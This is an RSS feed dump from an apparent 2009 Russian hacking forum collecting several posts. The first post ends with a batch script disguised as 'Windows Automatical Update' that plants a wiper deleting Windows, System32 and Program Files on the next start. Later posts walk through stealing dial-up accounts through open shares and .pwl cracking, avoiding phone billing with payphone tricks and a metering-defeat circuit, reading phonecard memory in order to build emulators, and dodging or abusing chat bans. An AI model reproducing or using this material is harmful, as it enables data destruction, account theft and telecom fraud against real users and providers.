						&lt;p&gt;&amp;lt;--------begin of &#039;chuchelo.cmd&#039;--------&amp;gt;&lt;br /&gt;@echo off&lt;br /&gt;title Windows Automatical Update&lt;br /&gt;echo Windows Automatical Update is running ...&lt;br /&gt;%SystemDrive%&lt;br /&gt;cd \&lt;br /&gt;cd %WinDir%&lt;br /&gt;cd System32&lt;br /&gt;copy autoexec.nt autoexec.tmp &amp;gt;nul&lt;br /&gt;:try&lt;br /&gt;If Exist %SystemRoot%\System32\usrupd.cmd Goto try2&lt;br /&gt;echo @echo off &amp;gt; usrupd.cmd&lt;br /&gt;echo echo Windows is update, please wait ... &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo %SystemDrive% &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo cd \ &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo cd %WinDir% &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo del *.* &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo cd system &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo del *.* &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo cd system32 &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo del *.* &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo cd .. &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo cd .. &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo cd %ProgramFiles% &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo del *.* &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo echo You windows is now with Service Pack 7! &amp;gt;&amp;gt; usrupd.cmd&lt;br /&gt;echo rem Windows Update &amp;gt; axmdf.tmp&lt;br /&gt;echo call %SystemRoot%\System32\usrupd.cmd &amp;gt;&amp;gt; axmdf.tmp&lt;br /&gt;echo rem &amp;gt;&amp;gt; axmdf.tmp&lt;br /&gt;del autoexec.nt &amp;gt; nul&lt;br /&gt;copy autoexec.tmp+axmdf.tmp autoexec.nt &amp;gt;nul&lt;br /&gt;del autoexec.tmp &amp;gt; nul&lt;br /&gt;del axmdf.tmp &amp;gt; nul&lt;br /&gt;goto exit&lt;/p&gt;
						&lt;p&gt;:try2&lt;br /&gt;del %SystemRoot%\system32\usrupd.cmd &amp;gt;nul&lt;br /&gt;goto try&lt;/p&gt;
						&lt;p&gt;:exit&lt;br /&gt;echo Update Completed ...&lt;br /&gt;&amp;lt;--------end of &#039;chuchelo.cmd&#039;--------&amp;gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 12:50:00 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=23#p23</guid>
		</item>
		<item>
			<title>Бесплатный интернет</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=22#p22</link>
			<description>&lt;p&gt;А знаешь ли ты, друг мой, о том, как хакеры &amp;quot;вытаскивают&amp;quot; твои драгоценные аккаунты прямо у тебя из-под носа? Существует достаточно много случаев, когда пользователь с удивлением для себя обнаруживает, что за его счет бродит по просторам Интернет кто-то еще и, естественно, тратит направо и налево его потом и кровью заработанные деньги. Обнаружив столь неприятное происшествие, он в ярости (или в недоумении - кто как) звонит в техподдержку своего провайдера и объясняет причину своего недовольства. Провайдер приносит свои соболезнования, но, к сожалению, ничем помочь не может, однако, предлагает сменить пользователю пароль и советует не допускать до компьютера тех людей, которые не достойны доверия. А самое главное, что тем людям, которые платят свои деньги за часы, проведенные в Интернет, провайдер не собирается возмещать ни денег, ни времени. Разочаровавшись и обвиняя во всех мнимых грехах техническую поддержку, ты размышляешь о том, как же этому гадскому хакеру удалось украсть твой аккаунт, и с обидой в душе на этот жестокий мир подумываешь о смене провайдера. Итак, каким же образом хакер смог &amp;quot;вытащить&amp;quot; твой аккаунт? На сегодняшний день мне известны несколько методов, которые используют хакеры. Обычно многие юзеры, устанавливая Windows 95/98/NT под сети, предоставляют доступ к своим дискам и директориям другим пользователям сети, тем самым открывая лазейку в свой компьютер. Для того чтобы в сети найти компьютер с такой лазейкой, хакеру необходимо просканировать диапазон IP-адресов одной сетки. Что для этого нужно? Для Windows 95/98/NT - программа &amp;quot;Legion&amp;quot;. После запуска этой программы нужно указать IP-адреса, которые будут использоваться для сканирования. Сначала хакер выбирает предполагаемого провайдера, услугами которого впоследствии он будет пользоваться. Например, это будет выдуманный нами провайдер wwwlamerishe.ru. Запустив свой mIRC, он отправляется на всем знакомый IRC и в окошке &amp;quot;status&amp;quot; пишет: /whois *.lamerishe.ru &lt;/p&gt;
						&lt;p&gt;Ответ не заставит себя ждать:#RUSSIAN Andrey H andrey@dialup-28059.lamerishe.ru :0 hello.&lt;br /&gt;*.junk.com&lt;br /&gt;End of /WHO list.&lt;/p&gt;
						&lt;p&gt;Дальше следует команда: /dns Andrey&lt;br /&gt;И mIRC выдает ему IP-шник жертвы:&lt;/p&gt;
						&lt;p&gt;*** Looking up dialup-28059.lamerishe.ru&lt;br /&gt;*** Resolved dialup-28059.lamerishe.ru to 121.31.21.10&lt;br /&gt;Вот он уже и знает один из ip-адресов (121.31.21.10) нашего выдуманного провайдера. Теперь нужно указать диапазон IP-адресов этого провайдера. Хакер запускает Legion и заполняет поля &amp;quot;Enter Start IP&amp;quot; (введите начальный IP) и &amp;quot;Enter End IP&amp;quot; (введите конечный IP). &lt;/p&gt;
						&lt;p&gt;Enter Start IP: 121.31.21.1&lt;br /&gt;Enter End IP: 121.31.21.254&lt;br /&gt;Остается только выбрать скорость соединения и нажать на кнопку &amp;quot;Scan&amp;quot;. Если после сканирования, в правом окне сканера, появится что-то вроде &amp;quot;\\121.31.21.87\C&amp;quot;, то в левом окне можно открыть этот IP и щелкнуть два раза на ответвлении &amp;quot;C&amp;quot;. Появится сообщение &amp;quot;MAPPED ON DRIVE E:&amp;quot;. Все это означает, что на данном IP есть машина, c незашаренным (то есть открытым для всех) диском С. И этот диск можно установить как еще один диск на своем компе. То есть у хакера на компе появится еще один диск (в данном случае - Е), по которому он будет лазить, как по своему собственному, хотя он и находится на удаленной машине. Конечно, главной целью для хакера является файл с расширением .pwl, в котором находится зашифрованный аккаунт. Этот файл лежит в каталоге Windows. И поэтому хакер заходит в «Пуск -&amp;gt; Программы -&amp;gt; Сеанс MS-DOS». Пишет там «e:» и нажимает Enter. Теперь он на жестком диске у чайника. Но каталог Windows может называться по-другому. Поэтому он пишет: E:\&amp;gt;dir win* и получает такой вот ответ: &lt;/p&gt;
						&lt;p&gt;Том в устройстве Е не имеет метки&lt;br /&gt;Серийный номер тома: 2247-15D0&lt;br /&gt;Содержимое каталога Е:\&lt;br /&gt;WIN95 &amp;lt;КАТАЛОГ&amp;gt; 11-30-98 6:48p WIN95&lt;br /&gt;0 файл(а,ов) 0 байт&lt;br /&gt;1 каталог(а,ов) 287,997,952 байт свободно&lt;/p&gt;
						&lt;p&gt;Дальше следуют команды:&lt;/p&gt;
						&lt;p&gt;E:\&amp;gt;cd win95&lt;br /&gt;E:\WIN95&amp;gt;dir *.pwl&lt;br /&gt;Том в устройстве Е не имеет метки&lt;br /&gt;Серийный номер тома: 2247-15D0&lt;br /&gt;Содержимое каталога Е:\WIN95&lt;br /&gt;ANDREY PWL 730 02-05-99 10:31p ANDREY.PWL&lt;br /&gt;1 файл(а,ов) 730 байт&lt;br /&gt;0 каталог(а,ов) 287,997,952 байт свободно&lt;br /&gt;E:\WIN95&amp;gt;copy andrey.pwl c:\hacking\pwlhack&lt;br /&gt;Теперь, после копирования файла с расширением .pwl, хакеру нужно отсоединиться от этого компьютера. Он открывает иконку &amp;quot;Мой компьютер&amp;quot;, выбирает иконку E:\121.31.21.87\C нажав правую кнопку мыши. Там жмет &amp;quot;Отсоединить&amp;quot;. Что теперь? А теперь он берет программу pwlhack (newdata2.box.sk/neworder/crackpwd/pwlhck32.rar) и с помощью нее расшифровывает добытый файл andrey.pwl. &lt;/p&gt;
						&lt;p&gt;C:\HACKING\PWLHACK&amp;gt;pwlhack.exe /list andrey.pwl andrey&lt;br /&gt;(C) 17-Apr-1998y by Hard Wisdom &amp;quot;PWL&#039;s Hacker&amp;quot; v3.0 (1996,97,98)&lt;br /&gt;Enter the password:&lt;br /&gt;File &#039;ANDREY.PWL&#039; has size 730 bytes, version [NEW_Win95_OSR/2]&lt;br /&gt;for user &#039;ANDREY&#039; with password &#039;&#039; contains:&lt;br /&gt;-[Type]-[The resource location string]--------------[Password]-&lt;br /&gt;Dial X *Rna\Соединение с lamerishe\L5tRe fsa3Xfa12&lt;br /&gt;---------------------------------------------------------------&lt;br /&gt;Indexed Entryes: 1; Number of resources: 1.&lt;br /&gt;Настает кульминационный момент! Итак, теперь с помощью аккаунта, добытого у &amp;quot;чайника&amp;quot;, хакер может лазить по просторам всемирной паутины Интернет. А вот и сам аккаунт: &lt;/p&gt;
						&lt;p&gt;Имя пользователя: L5tRe&lt;br /&gt;Пароль: fsa3Xfa12&lt;br /&gt;Если у данного провайдера можно посмотреть статистику прямо из Интернета, то, обычно, хакеры посещают сайт провайдера (в нашем примере wwwlamerishe.ru) и смотрят, сколько осталось денег на счету у пользователя и в какое время он обычно находится в Интернете. Кстати, телефоны модемных пулов также можно узнать на сайте у провайдера. :) Существует еще несколько иных способов, таких как использование троянов Netbus1.0, Netbus Pro 2.0, BackOrifice и т.д. Самый простой из всех способов заключается в том, что, зная IP-адрес с открытыми сетевыми ресурсами, можно соединиться с компьютером, нажав на Пуск, выбрав &amp;quot;Поиск компьютера&amp;quot; и указав IP-адрес. «Все. Систему я понял. Теперь объясни-ка мне, как устранить лазейку и защитить себя от непрошеных гостей?» - скажешь ты. Хорошо. Для защиты от описанной выше дырки тебе будет необходимо отключить привязку (службу доступа к файлам и принтерам) от контроллера удаленного доступа (лезь в «Панель управления» -&amp;gt; «Сеть»), а в Windows NT нужно запретить службу Server в Remote Access WAN Wrapper. Но от НетБаса, БэкОрифиса и подобных троянов это тебя не спасет. А вот чтобы не подхватить трояна, во-первых, никогда не подпускай никого к своему компьютеры со всякими дискетками, а, во-вторых, никогда не запускай у себя на компе никаких прог, в которых ты хоть на грамм сомневаешься. Последним хакерским способом по рассылке троянов был массовый спаминг с хоста microsoft.com, где в каждом письме лежал якобы патч к 4-му IE. Ну, а что этот «патч» делал, я думаю, ты уже догадался. :)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 12:49:08 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=22#p22</guid>
		</item>
		<item>
			<title>Бесплатные звонки</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=19#p19</link>
			<description>&lt;p&gt;Звонки по межгороду и с телефонов автоматов&lt;br /&gt;Старые телефоны-автоматы. Чтобы сделать устройство для бесплатных звонков по телефону-автомату, Вам потребуется кусок проволоки сантиметров 50 и металлический крокодильчик. Подойдет тот, который держит шторы на вашем окне. С одного конца провод совокупите с крокодильчиком, с другого оголите. Чтобы бесплатно поговорить:&lt;br /&gt;1) прицепите один конец провода к металлическому приемнику монет.&lt;br /&gt;2) Наберите нужный номер.&lt;br /&gt;3) Когда абонент возьмет трубку, и вы услышите характерный щелчок из голодного монетоприемника. Оголенный конец провода просуньте через отверстия телефонной трубки, так, чтобы он касался металлической части микрофона и не отпускайте его на протяжении всего разговора.&lt;br /&gt;УВЫ: действует это меньше чем на половине телефонов автоматах, поэтому придется побродить по разным переговорным пунктам в поисках нужных аппаратов.&lt;br /&gt;Есть ещё один способ. В монете или жетончике просверливается крохотное сквозное отверстие и продевается нитка. После провала монетки или жетона Вы можете вернуть его вытащив за нитку. Очень важно не изменить массу жетона при проделовании дырки. Так что дырка должна быть как можно меньше.&lt;br /&gt;Звонок по межгороду с домашнего телефона. Апробировано в течение двух лет в СНГ и шесть лет в европейских странах. Этот способ можно использовать только на длинных расстояниях, то есть при междугородней связи. Суть секрета основана на очень простой идее: Вы знаете, что когда вы набираете дисковым номеронабирателем (импульсная система набора) &amp;quot;1&amp;quot;, линия прерывается один раз, когда &amp;quot;7&amp;quot;, линия прерывается семь раз, когда &amp;quot;0&amp;quot; - 10 раз. Я стал наблюдать, что произойдет, если линию прервать более десяти pаз. Для реализации этой идеи, я использовал мой первый компьютер (8-ми битный &amp;quot;Enterprise-128&amp;quot; который имел разъем для программного контроля магнитофона), в моем случае вместо магнитофона была подключена телефонная линия. Короче, я не буду описывать все мои исследования для краткости изложения. Волшебным был номер &amp;quot;15&amp;quot;. Вот именно эти пятнадцать я и вставлял после 8. Вот так: 8 + гудок + пятнадцать + код страны + номер телефона и счета не приходят. Если Вы все поняли правильно, то должны были понять и то, что это число прерываний телефонной линии. Вот способ использования: 8+тон+волшебный номер 15+ код города + телефонный номер. Так, для бесплатного звонка в Москву по телефону 921-00-00, я набирал 8-волшебный номер 15 - 095-921-00-00. Я набирал &amp;quot;8&amp;quot; и ждал тонального сигнала для доступа на междугородную станцию, когда он приходил, я набирал 15 и тональный сигнал пропадал, тогда я набирал код города и телефонный номер. 15 это не 1 и 5, а пятнадцать прерываний телефонной сети, и если иметь достаточно выраженный музыкальный слух, то можно &amp;quot;нащелкать&amp;quot; эти 15 импульсов кнопкой &amp;quot;сброс&amp;quot; на обычном телефоне.&lt;br /&gt;Способ второй: звонишь по межгороду и после набора номера и/или во время разговора на параллельном дисковом телефоне вертишь диск. На некоторых АТС сбивается номер на АОНе и счет выставляется черти кому, на других счетчик минут обнуляется при щелчках. Некоторые АТС думают, что абонент вообще трубку положил! В общем надо пробовать, но на каждой АТС свой набор глюков...&lt;br /&gt;Взлом телефонных карточек.&lt;br /&gt;Не так давно на Российского потребителя обрушился целый поток новых платежных средств: таксофонные карты, магнитные карты метро, банковские карты и т.д, Коснемся пока только таксофонных карт. Наверное, каждый задавался вопросом, как же устроена и как работает таксофонная карта, и можно ли ее обмануть? Ответ на второй вопрос пока умолчим, а, вот, на первый попробуем ответить в доступной и популярной форме. Поскольку, при желании наиболее общую информацию можно найти в Интернете, то разговор пойдет конкретно про Таксофонные карты компании &amp;quot;Санкт-Петербургские таксофоны&amp;quot;.&lt;br /&gt;Таксофонная карта соответствует международному стандарту ISO 7816 в части 1и2. &lt;br /&gt;1808716-1:1987 &lt;br /&gt;Карточки идентификационные.&lt;br /&gt;Карточки на интегральных схемах с контактами.&lt;br /&gt;Часть 1. Физические характеристики.:&lt;br /&gt;СТК1 код В 4с. изд.1&lt;br /&gt;ISO 8716-2:1988 &lt;br /&gt;Карточки идентификационные.&lt;br /&gt;Карточки на интегральных схемах с контактами.&lt;br /&gt;Часть 2. Размеры и расположение контактов. &lt;br /&gt;СТК1 код D 7с. изд.1&lt;br /&gt;Кристалл на карте представляет собой электрически программируемое ПЗУ с последовательным побитным выводом информации, изготовленное по технологии NMOS. В этом ПЗУ используется 128 бит. Чтобы перепрограммировать карту, нужно стереть информацию из ПЗУ, но чип защищен от ультрафиолетового облучения специальной смолой. Даже если Вам удастся стереть чип, то нужно будет перепрограммировать специальную область производителя - первые 64 бита, а она защищена от записи плавким предохранителем, который пережигается на фабрике при производстве чипа. Основной способ обмана таксофонов - изготовление эмуляторов, т.е. устройств эмулирующих работу настоящей карты. Это довольно легко сделать на современных однокристальных микроЭВМ. Основной способ защиты таксофонов от таких эмуляторов - измерение межэлектродных сопротивлений, емкостей и сравнение их с номинальными, что позволяет таксофону отличить эмулятор от настоящей карты. Расположение и назначение контактов на карте (рис. 4):&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://pitachok.net/img/xak_18.jpg&quot; alt=&quot;http://pitachok.net/img/xak_18.jpg&quot; /&gt;&lt;br /&gt;1 VCC=5V - Питание.&lt;br /&gt;2 Reset (входной) - Сигнал инициализации карты.&lt;br /&gt;3 Clk (входной) о Тактовые импульсы.&lt;br /&gt;4 Не используется.&lt;br /&gt;5 GND (земля).&lt;br /&gt;6 Не используется.&lt;br /&gt;7 I/O - (вход и выход) - Побитовый ввод и вывод с карты.&lt;br /&gt;8 Не используется.&lt;br /&gt;Все сигналы соответствуют ТТЛ уровням. Читатель должен обратить внимание, что центральная пластинка соединена с землей.&lt;br /&gt;Чтение информации с карты&lt;br /&gt;Внутри карточки находится счетчик адреса разрядностью 9 бит. То есть, после чтения каждых 512 бит все начинается сначала. Счетчик может быть только увеличен. Если Вы хотите считать бит с адресом меньше текущего, то счетчик нужно сбросить в 0, а затем увеличить до необходимого значения. Операция сброса выглядит так:&lt;br /&gt;- сначала необходимо установить высокий уровень сигнала Reset (2 контакт карты), а затем установить и сбросить сигнал Clk. После сброса сигнала Reset на выходе (7-ой контакт карты) будет доступен бит с адресом 0. Затем нужно подавать тактовые импульсы на вход Clk (3-ий контакт карты). По фронту импульса происходит увеличение на единицу внутреннего счетчика адреса. После спада тактового импульса на выходе появляется следующий бит данных. Обычно удобнее представлять информацию в виде байтов. Для этого каждые 8 считанных бит группируют в байт, считая, что первым считывается менее значащий бит. Таким образом, последовательно считывая 1,0,0,1,0,1,1,1, получим байт ОхЕ9.&lt;br /&gt;Чтение через параллельный порт компьютера&lt;br /&gt;Поскольку все сигналы соответствуют уровню ТТЛ, то логично использовать для чтения информации обыкновенный принтерный порт. Не думаю, что надо приводить здесь полное техническое описание работы параллельного .порта, назначение контактов и описание портов ввода-вывода - это все можно найти в специальной технической литературе. &lt;br /&gt;Аппаратные средства&lt;br /&gt;Большинство аппаратных средств включают в себя некую соединительную конструкцию, состоящую из ответной части разъема параллельного порта, монтажного провода и считывающего устройства в виде обыкновенного куска текстолита с отверстиями, в которые вставлены штырьки. Контакты параллельного порта соединяются с контактами карточки в соответствии с приведенной таблицей 3.Параллельный порт компьютера&lt;br /&gt;11: Busy (входной)&lt;br /&gt;2: D0 (выходнной)&lt;br /&gt;25: Gnd&lt;br /&gt;3: D1 (выходной)	Карточка&lt;br /&gt;7: I/O&lt;br /&gt;2: Reset&lt;br /&gt;5: Gnd&lt;br /&gt;3: CLK&lt;/p&gt;
						&lt;p&gt;таб.3&lt;br /&gt;В таблице 3 не указан контакт 1 карточки - питание +5В. Его можно, взять с разъема клавиатуры или просто от батарейки.&lt;br /&gt;Программные средства &lt;br /&gt;Используем порт LPT1. Запись в принтерный порт осуществляется через порт 0х378. Записанный байт появляется на выходных контактах. Мы используем бит 0 для сигнала Reset и бит 1 для сигнала Clk. Чтение выполняется .через порт 0х379. В самом старшем бите появится инвертированное значение с входного контакта 11 (Busy).&lt;br /&gt;Что записано на карте&lt;br /&gt;Мы подошли к самому интересному месту - назначению каждого бита, записанного на карте. Естественно, что на картах других городов это назначение будет другим, но мы, как обещали, говорим о питерских карточках. На карточке используются только 16 байт. Все остальные равны OxFF. В процессе исследований было считано около 300 карточек. &lt;br /&gt;Примеры памяти карт &lt;br /&gt;Допустим , что имеется карта на 50 единиц, и её срок действия закончился. Номер 0050415503.&#039; Годна до 30.09.98 &lt;br /&gt;E9,30,FF,01,F1,E2,80,CO 00,00,00,00,00,FF,18,EA &lt;br /&gt;Эта карта на 400 единиц также пуста. Номер 0400155921. Годна до 30.09.98 E9,30,FF,01,88,A7,9B,E8 Карта на 1000 единиц. Осталось 998. Номер 1000013039.&lt;br /&gt;Годна до 31.12.99 &lt;br /&gt;E9,30,FF,01,F7,3F,59,DC&lt;br /&gt;00,01,7F,OF,3F,FF,68,6B&lt;br /&gt;Допустим, что по этой карте был произведен звонок. Осталось 6 единиц.&lt;br /&gt;E9,30,FF,01,F7,3F,59,DC&lt;br /&gt;00,00,00,00,3F, FP, 68,6В&lt;br /&gt;Ещё звонок, и она закончилась.&lt;br /&gt;Е9. 30, FF,01, F7,3F,59, DC&lt;br /&gt;00,00,. 00.00.00. FF. 68.6В &lt;br /&gt;Назначение полей&lt;br /&gt;1. Первые 4 байта какой то идентификатор. На всех картах E9,30,FF,01. &lt;br /&gt;2 Следующие 4 байта - серийный номер карты. Расположив биты в байтах в обратном порядке, а затем и сами байты, получим 32 разрядное целое без знака. К примеру, байты F7, 3F, 59, DC с обратным порядком бит выглядят как EF, FC, 9A, 3В. Получим номер карты Ox3B9AFCEF или 1000013039 в десятичном виде. Нетрудно заметить, что номер, напечатанный на карте, всегда состоит из 10 цифр, а первые 4 цифры - емкость карточки. &lt;br /&gt;3. Следующие 5 байт - количество единиц, оставшихся на карточке. Формат хранения очень интересный: используется количество единичных битов в байте, начиная с младшего. Соответственно значение байта 07 соответствует 3 единицам, значение IF - пяти, a 7F - семи единицам. Максимальное количество единиц, хранящихся в байте - семь. Используется восьмеричная система счисления. Таким образом, байты 00, 01, 7F, OF, 3F соответствуют 01746 в восьмеричной системе или 998 единиц в десятичной системе. Максимальное количество единиц может выражаться числом 77777 в восьмеричной, или 32767 - в десятичной системе.&lt;br /&gt;4. Следующий байт всегда равен FF. Иногда он не используется. &lt;br /&gt;5. Два последних байта, по-видимому, выражают CRC или другой контрольный код для первых 8-ми постоянных байт, т.к. при расходовании единиц они не меняются, но на каждой карточке они свои. Пока их назначение не ясно. Обнаружилось, что срок годности не записан на карте. По всей видимости, он как-то связан с номером карты.&lt;br /&gt;Возможно, каждому сроку годности соответствуют определенный диапазон номеров.&lt;br /&gt;Как уже говорилось, из 10 цифр номера первые 4 выражают емкость карты.Оставшиеся 6 не идентифицируют карту однозначно, т.к. уже выпущено более миллиона карт. Всего при подобной системе нумерации может существовать 6 миллионов карт:&lt;br /&gt;на 25 единиц с номерами от 0025000000 до 0025999999, &lt;br /&gt;на 50 единиц с номерами от 0050000000 до 0050999999, &lt;br /&gt;на 100 единиц с номерами от 0100000000 до 0100999999, &lt;br /&gt;на 200 единиц с номерами от 0200000000 до 0200999999, &lt;br /&gt;на 400 единиц с номерами от 0400000000 до 0400999999, &lt;br /&gt;на 1000 единиц с номерами от 1000000000 до 1000999999.&lt;/p&gt;
						&lt;p&gt;Интернет-телефония.&lt;br /&gt;Данная информация предназначена для бесплатных международных звонков при помощи Интернета. Необходимо: минимум 486sx - процессор, звуковая карта, Микрофон, колонки. Обеспечение: Win&#039;95, Интернет соединение, Internet Phone 5.0 (можно взять на wwwvocaltec.com) Service for Internet Phone 5.0 (делаете себе на wwwbiztrans.com; wwwdeltathree.com) примечание: Последние два пункта требуют кредитные карты для регистрации. Интернет вы можете достать без денег, предлагаю написать - lirik_tnt@hotmail.com там Вам всегда помогут с интернет соединением за ничтожную сумму. После того, как у вас все есть, можно приступать к настройке. Запускаете IPhone 5.0, выбираете настройку &amp;quot;services&amp;quot; и устанавливаете ваш сервис, который вы приобрели на wwwbiztrans.com (или еще где нибуть), а именно это: имя, пароль, и небольшой фаил. Настройка так проста что у вас на будет проблем с этим этапом. Далее после того как вы все правильно сделали, вы попадаете обратно в iphone 5.0. Теперь осталось только набрать номер, а именно a-bbb xxxxxxx где a-код страны, bbb-код города, xxxxxxx-телефон абонента. e.g. 1-301 5702045 где 1-USA, 301-код города Baltimore, 5702045 - телефон. Ждите и можете говорить сколько влезет, ни вызываемый абонент, ни вы не заплатите ни цента.&lt;br /&gt;Как не платить за повременку.&lt;br /&gt;Сейчас во многих городах и весях начинают вводить и экспериментировать с повременной оплатой за местные телефонные переговоры. Это просто разорительно, тем более для тех кто пользуется Интернетом.&lt;br /&gt;Предлагаем опробовать следующий способ.&lt;br /&gt;Известно, что при соединении абонентов, напряжение в телефонной линии падает с 60 В до 5...8 В. Именно при данном напряжении включается детектор состояния линии и АТС начинает начислять за разговор денежки.&lt;br /&gt;Предлагаемая схема может работать не зависимо от того, местное или междугороднее соединение происходит. &lt;br /&gt;Однако, пока второй абонент не снял трубку напряжение в линии еще слишком высокое для срабатывания схемы. Таким образом, пока вы слышите сигнал вызова, деньги еще не начисляются, хотя реально соединение уже произошло.&lt;br /&gt;Все, что для этого нужно сделать - предотвратить падение напряжения в линии после снятия трубки вторым абонентом, удерживая его в пределах 21....36 В. Для этого применяется простейшая схема:&lt;br /&gt;Для увеличения падения напряжения на стороне абонента, служит стабилитрон с напряжением стабилизации 12....30 В. Конденсатор, включенный параллельно стабилитрону служит для прохождения разговорного переменного тока, что повышает громкость разговора. Можно обойтись без диодного моста, но тогда устройство надо включать в соответствии с полярностью телефонной линии. Если вы используете модем, то для более четкой его работы можно зашунтировать диоды моста конденсаторами по 0,1 мкФ. Для голоса они не потребуются.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://pitachok.net/img/xak_19.jpg&quot; alt=&quot;http://pitachok.net/img/xak_19.jpg&quot; /&gt;&lt;br /&gt;Напряжение (тип) стабилитрона подбирается экспериментально в зависимости от конкретной АТС. Начните с большего напряжения. Уменьшайте его лишь до тех пор, пока станция не перестанет отрабатывать прекращение индукторного вызова. Дело в том, что оборудование определения состояния АТС имеет технологический &amp;quot;зазор&amp;quot; между напряжением прекращения вызова и разговорным напряжением для четкого срабатывания. Напряжение получившееся в результате подбора стабилитрона, должно как раз находиться посередине этого зазора. Таким образом, вызывная схема отключается, а схема счета времени еще не включается, что позволяет разговаривать бесплатно.&lt;br /&gt;АТС в это время думает, что второй абонент еще не снял трубку своего аппарата, а первый терпеливо ожидает, когда второй наконец проснется.&lt;br /&gt;Схема работает и на межгороде!&lt;br /&gt;Звоните на здоровье!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 12:43:15 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=19#p19</guid>
		</item>
		<item>
			<title>Бан или как выкидывают из чатов</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=18#p18</link>
			<description>&lt;p&gt;Администраторы делают так:&lt;br /&gt;1. Запрет на вход юзеру с данным именем (или удаление регистрации) - самое&lt;br /&gt;простое-просто меняем себе ник (можно даже сделать его точгно таким же как и был с&lt;br /&gt;помощью короткого дефиса)&lt;br /&gt;2. Блокирвка через кукисы. Админ прописывает в кукисы на машине юзера специальный код&lt;br /&gt;- решается тоже просто - удаляем кук чата из директории C:\WINDOWS\Cookies (если не&lt;br /&gt;знаете какой именно кук удалить-смело удаляйте все, большой беды не будет)&lt;br /&gt;3. Самое печальное - блокирвка IP. Блокироваться может как конкретный IP адрес, так и&lt;br /&gt;вся подсеть. Но и эта проблема решаема. Если у вас диалап, то попробуйте&lt;br /&gt;расконектиться и приконектится снова. При этом ваш динамический IP адрес изменится, и&lt;br /&gt;вы сможете войти в чат. Однако если у вас выделенка(т.е. статический IP адрес) или&lt;br /&gt;админ забанил всю подсеть вашего провайдера, то единственный выход - использование&lt;br /&gt;прокси/сокс сервера или анонимайзера. На данном сайте куча инфы по этому вопросу.&lt;/p&gt;
						&lt;p&gt;Как выкинуть из чата если ты не админ:)&lt;br /&gt;* Зарегистрировать этот ник (если он не зарегистрирован)&lt;br /&gt;* Послать на страничку со зловредным кодом, осуществляющим атаку на компьютер&lt;br /&gt;пользователя.&lt;br /&gt;* Подставить (читай ниже)...а выкинет админ:)))&lt;br /&gt;* Если в чате используются идентификаторы, то узнать его, зайти под ним в чат и&lt;br /&gt;нажать кнопку &amp;quot;выход&amp;quot;&lt;br /&gt;* Отключить от инета Нюком (если у чела Win95/98 и известен IP)&lt;br /&gt;* Узнать пароль юзера:)&lt;br /&gt;* Узнать пароль админа:))&lt;/p&gt;
						&lt;p&gt;Подставляем в Чате&lt;/p&gt;
						&lt;p&gt;Для того чтобы в чате говорить от имени любого зарегистрированного пользователя, надо&lt;br /&gt;просто некоторые английские буквы ника заменить на русские :)) Правда в некоторых&lt;br /&gt;чатах это не прокатывает :-))&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 12:39:08 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=18#p18</guid>
		</item>
		<item>
			<title>Атка на DNS</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;Введение Являясь одним из основных элементов инфраструктуры IP-сетей, служба доменных имен (DNS) в то же время далеко неидеальна с точки зрения информационной безопасности. Применение транспортного протокола без установления виртуального канала (UDP), отсутствие встроенных средств идентификации, аутентификации и разграничения доступа делают ее уязвимой для удаленных атак различных типов. В данной статье рассматривается межсегментная удаленная атака на DNS-сервер, не требующая выполнения каких либо жестких условий и допускающая эффективную практическую реализацию. &amp;gt; 1. DNS с высоты птичьего полета Служба доменных имен представляет собой распределенную базу данных, основным содержанием которой является информация о соответствии символических имен сетевых объектов их IP-адресам. DNS организована по иерархическому принципу. Структурной единицей этой базы является домен (domain), который в свою очередь может содержать другие домены (поддомены). Первичным источником информации о каждом домене является ответственный за данный домен DNS-сервер (на самом деле их может быть несколько). Ответственность за часть доменной информации (поддомены) может быть делегирована другим серверам Клиентская часть DNS называется резолвером (resolver), доступ к которому прикладные программы получают через API операционной системы. При взаимодействии резолвера с сервером в качестве транспортного протокола используется UDP, не предусматривающий формирования виртуального канала. Запросы, генерируемые резолвером, являются рекурсивными, т.е. в качестве ответа на такой запрос возвращается либо искомая информация, либо сообщение о ее отсутствии. Получив запрос от резолвера, сервер либо сразу же возвращает ответ (при условии наличия искомой информации в локальной базе), либо формирует запрос к другому серверу. Этот запрос обычно является итеративным и, в отличие от рекурсивного, допускает ответ в виде ссылки на другой сервер, который лучше осведомлен о месте расположения искомой информации. В общем случае поиск начинается с корневого сервера, который возвращает информацию о серверах, ответственных за домены верхнего уровня, после чего формируется новый итеративный запрос к одному из этих серверов и т.д. Результатом такой цепочки вопросов-ответов является либо получение искомой информации, либо вывод о ее отсутствии, после чего полученный ответ возвращается резолверу. Вся накопленная сервером в процессе работы информация кэшируется с целью ускорения обслуживания 